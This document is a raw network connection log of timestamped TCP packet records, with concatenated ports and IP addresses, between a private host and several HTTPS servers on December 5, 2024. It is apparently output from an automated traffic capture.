                                                                                        Dec 5, 2024 22:50:16.825383902 CET44349731142.250.181.129192.168.2.5
                                                                                        Dec 5, 2024 22:50:16.826812983 CET49742443192.168.2.5142.250.181.129
                                                                                        Dec 5, 2024 22:50:16.826855898 CET44349742142.250.181.129192.168.2.5
                                                                                        Dec 5, 2024 22:50:16.826922894 CET49742443192.168.2.5142.250.181.129
                                                                                        Dec 5, 2024 22:50:16.828969955 CET49742443192.168.2.5142.250.181.129
                                                                                        Dec 5, 2024 22:50:16.828983068 CET44349742142.250.181.129192.168.2.5
                                                                                        Dec 5, 2024 22:50:16.996042967 CET49745443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:50:16.996078968 CET4434974513.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:16.996182919 CET49745443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:50:16.996671915 CET49745443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:50:16.996681929 CET4434974513.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:17.904877901 CET49739443192.168.2.5172.217.19.238
                                                                                        Dec 5, 2024 22:50:17.904947996 CET49740443192.168.2.5172.217.19.238
                                                                                        Dec 5, 2024 22:50:17.904947996 CET49741443192.168.2.5142.250.181.129
                                                                                        Dec 5, 2024 22:50:17.904984951 CET49742443192.168.2.5142.250.181.129
                                                                                        Dec 5, 2024 22:50:17.905859947 CET49746443192.168.2.5172.217.19.238
                                                                                        Dec 5, 2024 22:50:17.905905962 CET44349746172.217.19.238192.168.2.5
                                                                                        Dec 5, 2024 22:50:17.905968904 CET49746443192.168.2.5172.217.19.238
                                                                                        Dec 5, 2024 22:50:17.906418085 CET49747443192.168.2.5172.217.19.238
                                                                                        Dec 5, 2024 22:50:17.906478882 CET44349747172.217.19.238192.168.2.5
                                                                                        Dec 5, 2024 22:50:17.906594038 CET49747443192.168.2.5172.217.19.238
                                                                                        Dec 5, 2024 22:50:17.907958031 CET49747443192.168.2.5172.217.19.238
                                                                                        Dec 5, 2024 22:50:17.907973051 CET44349747172.217.19.238192.168.2.5
                                                                                        Dec 5, 2024 22:50:17.908014059 CET49746443192.168.2.5172.217.19.238
                                                                                        Dec 5, 2024 22:50:17.908027887 CET44349746172.217.19.238192.168.2.5
                                                                                        Dec 5, 2024 22:50:18.723277092 CET4434974513.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:18.723346949 CET49745443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:50:18.727715015 CET49745443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:50:18.727734089 CET4434974513.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:18.727958918 CET4434974513.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:18.737101078 CET49745443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:50:18.779326916 CET4434974513.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:19.200638056 CET4434974513.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:19.200669050 CET4434974513.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:19.200680971 CET4434974513.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:19.200850964 CET49745443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:50:19.200881958 CET4434974513.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:19.200978994 CET49745443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:50:19.378237963 CET4434974513.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:19.378264904 CET4434974513.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:19.378402948 CET49745443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:50:19.378432035 CET4434974513.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:19.378478050 CET49745443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:50:19.461188078 CET4434974513.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:19.461210012 CET4434974513.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:19.461421013 CET49745443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:50:19.461448908 CET4434974513.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:19.461535931 CET49745443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:50:19.559691906 CET4434974513.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:19.559712887 CET4434974513.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:19.559757948 CET49745443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:50:19.559777021 CET4434974513.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:19.559830904 CET49745443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:50:19.595156908 CET4434974513.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:19.595181942 CET4434974513.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:19.595292091 CET49745443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:50:19.595331907 CET4434974513.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:19.595374107 CET49745443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:50:19.604145050 CET44349747172.217.19.238192.168.2.5
                                                                                        Dec 5, 2024 22:50:19.604229927 CET49747443192.168.2.5172.217.19.238
                                                                                        Dec 5, 2024 22:50:19.604943037 CET44349747172.217.19.238192.168.2.5
                                                                                        Dec 5, 2024 22:50:19.604994059 CET49747443192.168.2.5172.217.19.238
                                                                                        Dec 5, 2024 22:50:19.605462074 CET44349746172.217.19.238192.168.2.5
                                                                                        Dec 5, 2024 22:50:19.605530024 CET49746443192.168.2.5172.217.19.238
                                                                                        Dec 5, 2024 22:50:19.606247902 CET44349746172.217.19.238192.168.2.5
                                                                                        Dec 5, 2024 22:50:19.606293917 CET49746443192.168.2.5172.217.19.238
                                                                                        Dec 5, 2024 22:50:19.613559008 CET4434974513.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:19.613583088 CET4434974513.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:19.613663912 CET49745443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:50:19.613691092 CET4434974513.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:19.613730907 CET49745443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:50:19.635011911 CET4434974513.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:19.635044098 CET4434974513.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:19.635078907 CET49745443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:50:19.635094881 CET4434974513.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:19.635124922 CET49745443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:50:19.635138988 CET49745443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:50:19.659811974 CET49747443192.168.2.5172.217.19.238
                                                                                        Dec 5, 2024 22:50:19.659832001 CET44349747172.217.19.238192.168.2.5
                                                                                        Dec 5, 2024 22:50:19.660089016 CET44349747172.217.19.238192.168.2.5
                                                                                        Dec 5, 2024 22:50:19.660144091 CET49747443192.168.2.5172.217.19.238
                                                                                        Dec 5, 2024 22:50:19.663080931 CET49747443192.168.2.5172.217.19.238
                                                                                        Dec 5, 2024 22:50:19.666668892 CET49746443192.168.2.5172.217.19.238
                                                                                        Dec 5, 2024 22:50:19.666697979 CET44349746172.217.19.238192.168.2.5
                                                                                        Dec 5, 2024 22:50:19.667047024 CET44349746172.217.19.238192.168.2.5
                                                                                        Dec 5, 2024 22:50:19.667099953 CET49746443192.168.2.5172.217.19.238
                                                                                        Dec 5, 2024 22:50:19.667624950 CET49746443192.168.2.5172.217.19.238
                                                                                        Dec 5, 2024 22:50:19.707328081 CET44349747172.217.19.238192.168.2.5
                                                                                        Dec 5, 2024 22:50:19.715328932 CET44349746172.217.19.238192.168.2.5
                                                                                        Dec 5, 2024 22:50:19.745596886 CET4434974513.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:19.745616913 CET4434974513.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:19.745681047 CET49745443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:50:19.745697975 CET4434974513.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:19.745740891 CET49745443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:50:19.763139009 CET4434974513.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:19.763160944 CET4434974513.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:19.763283968 CET49745443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:50:19.763324976 CET4434974513.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:19.763458014 CET49745443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:50:19.774297953 CET4434974513.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:19.774316072 CET4434974513.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:19.774370909 CET49745443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:50:19.774386883 CET4434974513.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:19.774429083 CET49745443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:50:19.789084911 CET4434974513.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:19.789104939 CET4434974513.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:19.789144993 CET49745443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:50:19.789160013 CET4434974513.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:19.789194107 CET49745443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:50:19.789212942 CET49745443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:50:19.804085016 CET4434974513.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:19.804106951 CET4434974513.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:19.804167986 CET49745443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:50:19.804235935 CET4434974513.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:19.804852962 CET49745443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:50:19.817202091 CET4434974513.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:19.817229033 CET4434974513.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:19.817282915 CET49745443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:50:19.817295074 CET4434974513.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:19.817331076 CET49745443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:50:19.821434975 CET4434974513.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:19.821490049 CET49745443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:50:19.821500063 CET4434974513.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:19.821516037 CET4434974513.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:19.821551085 CET49745443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:50:19.821579933 CET49745443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:50:19.821805954 CET49745443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:50:19.821824074 CET4434974513.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:19.821834087 CET49745443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:50:19.821840048 CET4434974513.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:19.899451017 CET49749443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:50:19.899502039 CET4434974913.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:19.899564028 CET49749443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:50:19.903503895 CET49750443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:50:19.903536081 CET4434975013.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:19.903594971 CET49750443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:50:19.903738976 CET49750443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:50:19.903747082 CET4434975013.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:19.904073954 CET49751443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:50:19.904109001 CET4434975113.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:19.904159069 CET49751443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:50:19.904401064 CET49751443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:50:19.904418945 CET4434975113.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:19.904874086 CET49749443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:50:19.904889107 CET4434974913.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:19.907063007 CET49752443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:50:19.907089949 CET4434975213.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:19.907150984 CET49752443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:50:19.907339096 CET49752443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:50:19.907350063 CET4434975213.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:19.910100937 CET49753443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:50:19.910132885 CET4434975313.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:19.910193920 CET49753443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:50:19.910299063 CET49753443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:50:19.910307884 CET4434975313.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:20.512346029 CET44349747172.217.19.238192.168.2.5
                                                                                        Dec 5, 2024 22:50:20.512415886 CET49747443192.168.2.5172.217.19.238
                                                                                        Dec 5, 2024 22:50:20.512451887 CET44349747172.217.19.238192.168.2.5
                                                                                        Dec 5, 2024 22:50:20.512499094 CET49747443192.168.2.5172.217.19.238
                                                                                        Dec 5, 2024 22:50:20.512638092 CET49747443192.168.2.5172.217.19.238
                                                                                        Dec 5, 2024 22:50:20.512674093 CET44349747172.217.19.238192.168.2.5
                                                                                        Dec 5, 2024 22:50:20.512728930 CET49747443192.168.2.5172.217.19.238
                                                                                        Dec 5, 2024 22:50:20.513325930 CET49756443192.168.2.5172.217.19.238
                                                                                        Dec 5, 2024 22:50:20.513375998 CET44349756172.217.19.238192.168.2.5
                                                                                        Dec 5, 2024 22:50:20.513436079 CET49756443192.168.2.5172.217.19.238
                                                                                        Dec 5, 2024 22:50:20.513806105 CET49756443192.168.2.5172.217.19.238
                                                                                        Dec 5, 2024 22:50:20.513820887 CET44349756172.217.19.238192.168.2.5
                                                                                        Dec 5, 2024 22:50:20.514589071 CET44349746172.217.19.238192.168.2.5
                                                                                        Dec 5, 2024 22:50:20.514684916 CET49746443192.168.2.5172.217.19.238
                                                                                        Dec 5, 2024 22:50:20.514760017 CET49746443192.168.2.5172.217.19.238
                                                                                        Dec 5, 2024 22:50:20.514797926 CET44349746172.217.19.238192.168.2.5
                                                                                        Dec 5, 2024 22:50:20.514839888 CET49746443192.168.2.5172.217.19.238
                                                                                        Dec 5, 2024 22:50:20.515350103 CET49757443192.168.2.5172.217.19.238
                                                                                        Dec 5, 2024 22:50:20.515383959 CET44349757172.217.19.238192.168.2.5
                                                                                        Dec 5, 2024 22:50:20.515511990 CET49757443192.168.2.5172.217.19.238
                                                                                        Dec 5, 2024 22:50:20.515511990 CET49758443192.168.2.5142.250.181.129
                                                                                        Dec 5, 2024 22:50:20.515535116 CET44349758142.250.181.129192.168.2.5
                                                                                        Dec 5, 2024 22:50:20.515634060 CET49758443192.168.2.5142.250.181.129
                                                                                        Dec 5, 2024 22:50:20.515944958 CET49758443192.168.2.5142.250.181.129
                                                                                        Dec 5, 2024 22:50:20.515954971 CET44349758142.250.181.129192.168.2.5
                                                                                        Dec 5, 2024 22:50:20.516422987 CET49757443192.168.2.5172.217.19.238
                                                                                        Dec 5, 2024 22:50:20.516429901 CET44349757172.217.19.238192.168.2.5
                                                                                        Dec 5, 2024 22:50:20.516902924 CET49759443192.168.2.5142.250.181.129
                                                                                        Dec 5, 2024 22:50:20.516930103 CET44349759142.250.181.129192.168.2.5
                                                                                        Dec 5, 2024 22:50:20.516983032 CET49759443192.168.2.5142.250.181.129
                                                                                        Dec 5, 2024 22:50:20.517277956 CET49759443192.168.2.5142.250.181.129
                                                                                        Dec 5, 2024 22:50:20.517296076 CET44349759142.250.181.129192.168.2.5
                                                                                        Dec 5, 2024 22:50:21.621841908 CET4434975013.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:21.622545004 CET4434975113.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:21.622584105 CET4434974913.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:21.622765064 CET49750443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:50:21.622787952 CET4434975013.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:21.623363018 CET4434975213.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:21.623616934 CET49751443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:50:21.623651028 CET4434975113.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:21.623739958 CET49750443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:50:21.623750925 CET4434975013.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:21.624011040 CET49749443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:50:21.624027014 CET4434974913.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:21.624288082 CET49751443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:50:21.624300003 CET4434975113.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:21.624401093 CET49749443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:50:21.624406099 CET4434974913.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:21.624468088 CET49752443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:50:21.624490023 CET4434975213.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:21.624835968 CET49752443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:50:21.624840975 CET4434975213.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:21.627381086 CET4434975313.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:21.630026102 CET49753443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:50:21.630050898 CET4434975313.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:21.630517960 CET49753443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:50:21.630522966 CET4434975313.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:22.057005882 CET4434975013.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:22.057025909 CET4434975013.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:22.057075024 CET4434975013.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:22.057106018 CET49750443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:50:22.057137966 CET49750443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:50:22.057436943 CET49750443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:50:22.057455063 CET4434975013.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:22.057476997 CET49750443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:50:22.057482004 CET4434975013.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:22.058434010 CET4434974913.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:22.058451891 CET4434974913.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:22.058494091 CET4434974913.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:22.058530092 CET49749443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:50:22.058573961 CET49749443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:50:22.059006929 CET49749443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:50:22.059020042 CET4434974913.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:22.059040070 CET49749443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:50:22.059045076 CET4434974913.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:22.061623096 CET4434975113.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:22.061678886 CET4434975113.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:22.061728001 CET49751443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:50:22.063133001 CET49760443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:50:22.063163996 CET4434976013.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:22.063308954 CET49760443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:50:22.064335108 CET49761443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:50:22.064369917 CET4434976113.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:22.064536095 CET4434975213.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:22.064559937 CET4434975213.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:22.064559937 CET4434975313.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:22.064605951 CET4434975213.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:22.064615011 CET4434975313.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:22.064625025 CET49761443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:50:22.064636946 CET49752443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:50:22.064675093 CET49752443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:50:22.064834118 CET49753443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:50:22.065031052 CET49761443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:50:22.065043926 CET4434976113.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:22.065254927 CET49752443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:50:22.065264940 CET4434975213.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:22.065320015 CET49752443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:50:22.065324068 CET4434975213.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:22.065408945 CET49753443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:50:22.065417051 CET4434975313.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:22.065435886 CET49753443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:50:22.065439939 CET4434975313.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:22.068279982 CET49762443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:50:22.068286896 CET4434976213.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:22.068344116 CET49762443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:50:22.068653107 CET49762443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:50:22.068661928 CET4434976213.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:22.068885088 CET49751443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:50:22.068890095 CET4434975113.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:22.068901062 CET49751443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:50:22.068903923 CET4434975113.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:22.070380926 CET49760443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:50:22.070386887 CET4434976013.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:22.071413040 CET49763443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:50:22.071422100 CET4434976313.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:22.071476936 CET49763443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:50:22.071696997 CET49763443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:50:22.071707964 CET4434976313.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:22.073147058 CET49764443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:50:22.073172092 CET4434976413.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:22.073321104 CET49764443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:50:22.073481083 CET49764443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:50:22.073488951 CET4434976413.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:22.242132902 CET44349756172.217.19.238192.168.2.5
                                                                                        Dec 5, 2024 22:50:22.242229939 CET49756443192.168.2.5172.217.19.238
                                                                                        Dec 5, 2024 22:50:22.242870092 CET44349756172.217.19.238192.168.2.5
                                                                                        Dec 5, 2024 22:50:22.242918015 CET49756443192.168.2.5172.217.19.238
                                                                                        Dec 5, 2024 22:50:22.246310949 CET44349758142.250.181.129192.168.2.5
                                                                                        Dec 5, 2024 22:50:22.246381998 CET49758443192.168.2.5142.250.181.129
                                                                                        Dec 5, 2024 22:50:22.246433973 CET44349759142.250.181.129192.168.2.5
                                                                                        Dec 5, 2024 22:50:22.246481895 CET49759443192.168.2.5142.250.181.129
                                                                                        Dec 5, 2024 22:50:22.247072935 CET44349757172.217.19.238192.168.2.5
                                                                                        Dec 5, 2024 22:50:22.247127056 CET49757443192.168.2.5172.217.19.238
                                                                                        Dec 5, 2024 22:50:22.247832060 CET44349757172.217.19.238192.168.2.5
                                                                                        Dec 5, 2024 22:50:22.247874022 CET49757443192.168.2.5172.217.19.238
                                                                                        Dec 5, 2024 22:50:22.412847996 CET49756443192.168.2.5172.217.19.238
                                                                                        Dec 5, 2024 22:50:22.412868977 CET44349756172.217.19.238192.168.2.5
                                                                                        Dec 5, 2024 22:50:22.413136959 CET44349756172.217.19.238192.168.2.5
                                                                                        Dec 5, 2024 22:50:22.413255930 CET49756443192.168.2.5172.217.19.238
                                                                                        Dec 5, 2024 22:50:22.414077044 CET49756443192.168.2.5172.217.19.238
                                                                                        Dec 5, 2024 22:50:22.414284945 CET49758443192.168.2.5142.250.181.129
                                                                                        Dec 5, 2024 22:50:22.414298058 CET44349758142.250.181.129192.168.2.5
                                                                                        Dec 5, 2024 22:50:22.414495945 CET44349758142.250.181.129192.168.2.5
                                                                                        Dec 5, 2024 22:50:22.414536953 CET49758443192.168.2.5142.250.181.129
                                                                                        Dec 5, 2024 22:50:22.414823055 CET49758443192.168.2.5142.250.181.129
                                                                                        Dec 5, 2024 22:50:22.416131973 CET49759443192.168.2.5142.250.181.129
                                                                                        Dec 5, 2024 22:50:22.416141033 CET44349759142.250.181.129192.168.2.5
                                                                                        Dec 5, 2024 22:50:22.416421890 CET44349759142.250.181.129192.168.2.5
                                                                                        Dec 5, 2024 22:50:22.416671991 CET49759443192.168.2.5142.250.181.129
                                                                                        Dec 5, 2024 22:50:22.418200970 CET49759443192.168.2.5142.250.181.129
                                                                                        Dec 5, 2024 22:50:22.446392059 CET49757443192.168.2.5172.217.19.238
                                                                                        Dec 5, 2024 22:50:22.446403027 CET44349757172.217.19.238192.168.2.5
                                                                                        Dec 5, 2024 22:50:22.446696043 CET44349757172.217.19.238192.168.2.5
                                                                                        Dec 5, 2024 22:50:22.446808100 CET49757443192.168.2.5172.217.19.238
                                                                                        Dec 5, 2024 22:50:22.447416067 CET49757443192.168.2.5172.217.19.238
                                                                                        Dec 5, 2024 22:50:22.459321022 CET44349758142.250.181.129192.168.2.5
                                                                                        Dec 5, 2024 22:50:22.459321976 CET44349756172.217.19.238192.168.2.5
                                                                                        Dec 5, 2024 22:50:22.459331036 CET44349759142.250.181.129192.168.2.5
                                                                                        Dec 5, 2024 22:50:22.495318890 CET44349757172.217.19.238192.168.2.5
                                                                                        Dec 5, 2024 22:50:23.147938967 CET44349756172.217.19.238192.168.2.5
                                                                                        Dec 5, 2024 22:50:23.148000002 CET49756443192.168.2.5172.217.19.238
                                                                                        Dec 5, 2024 22:50:23.148020029 CET44349756172.217.19.238192.168.2.5
                                                                                        Dec 5, 2024 22:50:23.148061037 CET49756443192.168.2.5172.217.19.238
                                                                                        Dec 5, 2024 22:50:23.148608923 CET49756443192.168.2.5172.217.19.238
                                                                                        Dec 5, 2024 22:50:23.148649931 CET44349756172.217.19.238192.168.2.5
                                                                                        Dec 5, 2024 22:50:23.148696899 CET49756443192.168.2.5172.217.19.238
                                                                                        Dec 5, 2024 22:50:23.148729086 CET49756443192.168.2.5172.217.19.238
                                                                                        Dec 5, 2024 22:50:23.149638891 CET49766443192.168.2.5172.217.19.238
                                                                                        Dec 5, 2024 22:50:23.149682045 CET44349766172.217.19.238192.168.2.5
                                                                                        Dec 5, 2024 22:50:23.149777889 CET49766443192.168.2.5172.217.19.238
                                                                                        Dec 5, 2024 22:50:23.150121927 CET49766443192.168.2.5172.217.19.238
                                                                                        Dec 5, 2024 22:50:23.150141001 CET44349766172.217.19.238192.168.2.5
                                                                                        Dec 5, 2024 22:50:23.193528891 CET44349757172.217.19.238192.168.2.5
